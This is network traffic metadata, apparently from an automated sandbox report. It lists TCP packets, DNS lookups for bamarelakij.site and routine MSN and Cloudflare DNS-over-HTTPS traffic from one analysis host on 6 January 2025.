                                                                                                                                                            Jan 6, 2025 23:05:20.684329987 CET49966443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.684329987 CET49966443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.684345007 CET44349966104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:20.780812979 CET44349960104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:20.780857086 CET44349960104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:20.780944109 CET49960443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.781018972 CET49960443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.781032085 CET44349960104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:20.781042099 CET49960443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:20.781047106 CET44349960104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:21.016043901 CET44349966104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:21.016104937 CET44349966104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:21.016176939 CET49966443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:21.016416073 CET49966443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:21.016428947 CET44349966104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:21.016468048 CET49966443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:05:21.016478062 CET44349966104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:21.821361065 CET44349824172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:21.821424007 CET44349824172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:21.821583033 CET49824443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:21.848012924 CET44349825172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:21.848079920 CET44349825172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:21.848203897 CET49825443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:22.164103031 CET49824443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:22.164129019 CET44349824172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:22.164165020 CET49825443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:22.164184093 CET44349825172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:29.623606920 CET4434987223.57.90.149192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:29.623625040 CET4434987123.57.90.149192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:29.623687029 CET4434987223.57.90.149192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:29.623692036 CET4434987123.57.90.149192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:29.623961926 CET49871443192.168.2.423.57.90.149
                                                                                                                                                            Jan 6, 2025 23:05:29.623964071 CET49872443192.168.2.423.57.90.149
                                                                                                                                                            Jan 6, 2025 23:05:55.045191050 CET49873443192.168.2.4204.79.197.219
                                                                                                                                                            Jan 6, 2025 23:05:55.045221090 CET44349873204.79.197.219192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:55.045239925 CET49874443192.168.2.4204.79.197.219
                                                                                                                                                            Jan 6, 2025 23:05:55.045258999 CET44349874204.79.197.219192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.435539961 CET49872443192.168.2.423.57.90.149
                                                                                                                                                            Jan 6, 2025 23:06:04.435544968 CET49871443192.168.2.423.57.90.149
                                                                                                                                                            Jan 6, 2025 23:06:04.435564995 CET4434987223.57.90.149192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.435575008 CET4434987123.57.90.149192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.437247038 CET50115443192.168.2.423.57.90.157
                                                                                                                                                            Jan 6, 2025 23:06:04.437271118 CET4435011523.57.90.157192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.441310883 CET50115443192.168.2.423.57.90.157
                                                                                                                                                            Jan 6, 2025 23:06:04.445425034 CET50115443192.168.2.423.57.90.157
                                                                                                                                                            Jan 6, 2025 23:06:04.445440054 CET4435011523.57.90.157192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.898427010 CET4435011523.57.90.157192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.898910999 CET50115443192.168.2.423.57.90.157
                                                                                                                                                            Jan 6, 2025 23:06:04.898929119 CET4435011523.57.90.157192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.899257898 CET4435011523.57.90.157192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.899621010 CET50115443192.168.2.423.57.90.157
                                                                                                                                                            Jan 6, 2025 23:06:04.899693966 CET4435011523.57.90.157192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.951643944 CET50115443192.168.2.423.57.90.157
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                            Jan 6, 2025 23:05:06.573520899 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:06.582084894 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:06.582461119 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:06.615593910 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:06.704304934 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:06.792033911 CET54292443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:06.895639896 CET44354292172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:06.895977020 CET44354292172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:06.896534920 CET44354292172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:06.896545887 CET44354292172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:06.897465944 CET54292443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:06.898447990 CET54292443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:06.898550987 CET54292443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:06.898823023 CET54292443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:06.898914099 CET54292443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:07.010313988 CET44354292172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:07.010354996 CET44354292172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:07.010382891 CET44354292172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:07.010411024 CET44354292172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:07.010580063 CET44354292172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:07.010857105 CET54292443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:07.010982037 CET54292443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:07.026096106 CET44354292172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:07.027538061 CET54292443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:07.109153986 CET44354292172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:07.141582012 CET54292443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:07.702927113 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:07.703353882 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:07.763241053 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:07.763355970 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:07.800220013 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:07.802242041 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:07.804210901 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:07.804389000 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:07.860063076 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:07.861565113 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:07.864002943 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:07.864305019 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:08.079428911 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:08.079624891 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:08.163399935 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:08.163671017 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:08.176768064 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:08.178111076 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:08.178582907 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:08.178807974 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:08.260349035 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:08.261105061 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:08.261321068 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:08.262893915 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:08.279508114 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:08.279726028 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:08.377619028 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:08.378428936 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:08.380048037 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:08.385689974 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:09.266263962 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:09.266716957 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:09.267281055 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:09.267776966 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:09.305627108 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:09.305753946 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:09.363114119 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.364119053 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.364583969 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.364599943 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.364846945 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.364865065 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:09.366637945 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.366956949 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:09.368205070 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:09.368527889 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:09.428426027 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.428669930 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.428687096 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.428874016 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:09.465244055 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.465857029 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.466245890 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.466836929 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.467108965 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:09.994463921 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:09.994682074 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:10.090959072 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.091923952 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.091969013 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.092855930 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:21.185084105 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:21.185250044 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:21.282197952 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:21.285022020 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:21.289813995 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:21.290045023 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:22.164568901 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:22.164889097 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:22.165781975 CET54292443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:22.166256905 CET54292443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:22.261492014 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:22.262938023 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:22.263339996 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:22.263650894 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:22.265100956 CET44354292172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:22.266782045 CET44354292172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:22.267553091 CET44354292172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:22.267791033 CET54292443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:06:03.792830944 CET59699443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:06:03.793270111 CET59699443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:06:03.793544054 CET59699443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:06:03.793965101 CET59699443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:06:04.119427919 CET59699443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:06:04.243030071 CET44359699162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.243089914 CET44359699162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.243099928 CET44359699162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.243108034 CET44359699162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.243115902 CET44359699162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.243804932 CET59699443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:06:04.243804932 CET59699443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:06:04.243870974 CET59699443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:06:04.243937016 CET59699443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:06:04.337383032 CET44359699162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.337800980 CET59699443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:06:04.433113098 CET44359699162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.434149027 CET44359699162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.434508085 CET44359699162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.434823990 CET59699443192.168.2.4162.159.61.3
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jan 6, 2025 23:05:04.475508928 CET | 192.168.2.4 | 1.1.1.1 | c2a0 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 6, 2025 23:04:46.339977026 CET | 192.168.2.4 | 1.1.1.1 | 0x9214 | Standard query (0) | bamarelakij.site | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:00.305433989 CET | 192.168.2.4 | 1.1.1.1 | 0xe6a0 | Standard query (0) | ntp.msn.com | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:00.305563927 CET | 192.168.2.4 | 1.1.1.1 | 0xe276 | Standard query (0) | ntp.msn.com | 65 | IN (0x0001) | false
Jan 6, 2025 23:05:02.096301079 CET | 192.168.2.4 | 1.1.1.1 | 0x163b | Standard query (0) | bzib.nelreports.net | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:02.096585035 CET | 192.168.2.4 | 1.1.1.1 | 0xf735 | Standard query (0) | bzib.nelreports.net | 65 | IN (0x0001) | false
Jan 6, 2025 23:05:02.572757006 CET | 192.168.2.4 | 1.1.1.1 | 0x80a6 | Standard query (0) | clients2.googleusercontent.com | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:02.572966099 CET | 192.168.2.4 | 1.1.1.1 | 0x29d4 | Standard query (0) | clients2.googleusercontent.com | 65 | IN (0x0001) | false
Jan 6, 2025 23:05:03.448410034 CET | 192.168.2.4 | 1.1.1.1 | 0xa48 | Standard query (0) | sb.scorecardresearch.com | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:03.448410034 CET | 192.168.2.4 | 1.1.1.1 | 0x60ba | Standard query (0) | sb.scorecardresearch.com | 65 | IN (0x0001) | false
Jan 6, 2025 23:05:03.451582909 CET | 192.168.2.4 | 1.1.1.1 | 0xcfc8 | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:03.451582909 CET | 192.168.2.4 | 1.1.1.1 | 0xf564 | Standard query (0) | assets.msn.com | 65 | IN (0x0001) | false
Jan 6, 2025 23:05:03.457295895 CET | 192.168.2.4 | 1.1.1.1 | 0x5639 | Standard query (0) | c.msn.com | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:03.457587957 CET | 192.168.2.4 | 1.1.1.1 | 0xe93a | Standard query (0) | c.msn.com | 65 | IN (0x0001) | false
Jan 6, 2025 23:05:03.469726086 CET | 192.168.2.4 | 1.1.1.1 | 0x71ee | Standard query (0) | api.msn.com | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:03.469919920 CET | 192.168.2.4 | 1.1.1.1 | 0x63e | Standard query (0) | api.msn.com | 65 | IN (0x0001) | false
Jan 6, 2025 23:05:04.806452990 CET | 192.168.2.4 | 1.1.1.1 | 0x8c5e | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:04.806797028 CET | 192.168.2.4 | 1.1.1.1 | 0x6b8f | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Jan 6, 2025 23:05:04.807298899 CET | 192.168.2.4 | 1.1.1.1 | 0x950e | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:04.807593107 CET | 192.168.2.4 | 1.1.1.1 | 0xa2b4 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Jan 6, 2025 23:05:04.902157068 CET | 192.168.2.4 | 1.1.1.1 | 0x256a | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:04.902343988 CET | 192.168.2.4 | 1.1.1.1 | 0x30e9 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
2025-01-06 22:05:06 UTC | 192.168.2.4 | 162.159.61.3 | 0x0 | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | true
2025-01-06 22:05:06 UTC | 192.168.2.4 | 162.159.61.3 | 0x0 | Standard query (0) | assets.msn.com | 65 | IN (0x0001) | true
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 6, 2025 23:04:46.353698969 CET | 1.1.1.1 | 192.168.2.4 | 0x9214 | No error (0) | bamarelakij.site | - | 104.21.80.52 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:04:46.353698969 CET | 1.1.1.1 | 192.168.2.4 | 0x9214 | No error (0) | bamarelakij.site | - | 172.67.174.91 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:00.297626972 CET | 1.1.1.1 | 192.168.2.4 | 0x17ea | No error (0) | svc.ha-teams.office.com | mira-tmc.tm-4.office.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:05:00.312211037 CET | 1.1.1.1 | 192.168.2.4 | 0xe6a0 | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:05:00.312520027 CET | 1.1.1.1 | 192.168.2.4 | 0xe276 | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:05:02.103308916 CET | 1.1.1.1 | 192.168.2.4 | 0x163b | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:05:02.103784084 CET | 1.1.1.1 | 192.168.2.4 | 0xf735 | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:05:02.579490900 CET | 1.1.1.1 | 192.168.2.4 | 0x80a6 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:05:02.579490900 CET | 1.1.1.1 | 192.168.2.4 | 0x80a6 | No error (0) | googlehosted.l.googleusercontent.com | - | 142.250.186.97 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:02.580117941 CET | 1.1.1.1 | 192.168.2.4 | 0x29d4 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:05:03.455588102 CET | 1.1.1.1 | 192.168.2.4 | 0xa48 | No error (0) | sb.scorecardresearch.com | - | 18.244.18.32 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:03.455588102 CET | 1.1.1.1 | 192.168.2.4 | 0xa48 | No error (0) | sb.scorecardresearch.com | - | 18.244.18.27 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:03.455588102 CET | 1.1.1.1 | 192.168.2.4 | 0xa48 | No error (0) | sb.scorecardresearch.com | - | 18.244.18.38 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:03.455588102 CET | 1.1.1.1 | 192.168.2.4 | 0xa48 | No error (0) | sb.scorecardresearch.com | - | 18.244.18.122 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:03.459222078 CET | 1.1.1.1 | 192.168.2.4 | 0xf564 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:05:03.459436893 CET | 1.1.1.1 | 192.168.2.4 | 0xcfc8 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:05:03.464462042 CET | 1.1.1.1 | 192.168.2.4 | 0x5639 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:05:03.464749098 CET | 1.1.1.1 | 192.168.2.4 | 0xe93a | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:05:03.476480961 CET | 1.1.1.1 | 192.168.2.4 | 0x71ee | No error (0) | api.msn.com | api-msn-com.a-0003.a-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:05:03.476809025 CET | 1.1.1.1 | 192.168.2.4 | 0x63e | No error (0) | api.msn.com | api-msn-com.a-0003.a-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:05:04.536864996 CET | 1.1.1.1 | 192.168.2.4 | 0x72d5 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 23:05:04.536864996 CET | 1.1.1.1 | 192.168.2.4 | 0x72d5 | No error (0) | s-part-0017.t-0009.t-msedge.net | - | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:04.813246965 CET | 1.1.1.1 | 192.168.2.4 | 0x8c5e | No error (0) | chrome.cloudflare-dns.com | - | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:04.813246965 CET | 1.1.1.1 | 192.168.2.4 | 0x8c5e | No error (0) | chrome.cloudflare-dns.com | - | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:04.813663960 CET | 1.1.1.1 | 192.168.2.4 | 0x6b8f | No error (0) | chrome.cloudflare-dns.com | - | - | 65 | IN (0x0001) | false
Jan 6, 2025 23:05:04.814146042 CET | 1.1.1.1 | 192.168.2.4 | 0x950e | No error (0) | chrome.cloudflare-dns.com | - | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:04.814146042 CET | 1.1.1.1 | 192.168.2.4 | 0x950e | No error (0) | chrome.cloudflare-dns.com | - | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:04.814157009 CET | 1.1.1.1 | 192.168.2.4 | 0xa2b4 | No error (0) | chrome.cloudflare-dns.com | - | - | 65 | IN (0x0001) | false
Jan 6, 2025 23:05:04.909204006 CET | 1.1.1.1 | 192.168.2.4 | 0x30e9 | No error (0) | chrome.cloudflare-dns.com | - | - | 65 | IN (0x0001) | false
Jan 6, 2025 23:05:04.909238100 CET | 1.1.1.1 | 192.168.2.4 | 0x256a | No error (0) | chrome.cloudflare-dns.com | - | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:05:04.909238100 CET | 1.1.1.1 | 192.168.2.4 | 0x256a | No error (0) | chrome.cloudflare-dns.com | - | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:06:00.480407000 CET | 1.1.1.1 | 192.168.2.4 | 0x8f3 | No error (0) | fg.microsoft.map.fastly.net | - | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:06:00.480407000 CET | 1.1.1.1 | 192.168.2.4 | 0x8f3 | No error (0) | fg.microsoft.map.fastly.net | - | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:06:01.490478992 CET | 1.1.1.1 | 192.168.2.4 | 0x8f3 | No error (0) | fg.microsoft.map.fastly.net | - | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:06:01.490478992 CET | 1.1.1.1 | 192.168.2.4 | 0x8f3 | No error (0) | fg.microsoft.map.fastly.net | - | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:06:02.506644964 CET | 1.1.1.1 | 192.168.2.4 | 0x8f3 | No error (0) | fg.microsoft.map.fastly.net | - | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 23:06:02.506644964 CET | 1.1.1.1 | 192.168.2.4 | 0x8f3 | No error (0) | fg.microsoft.map.fastly.net | - | 199.232.214.172 | A (IP address) | IN (0x0001) | false
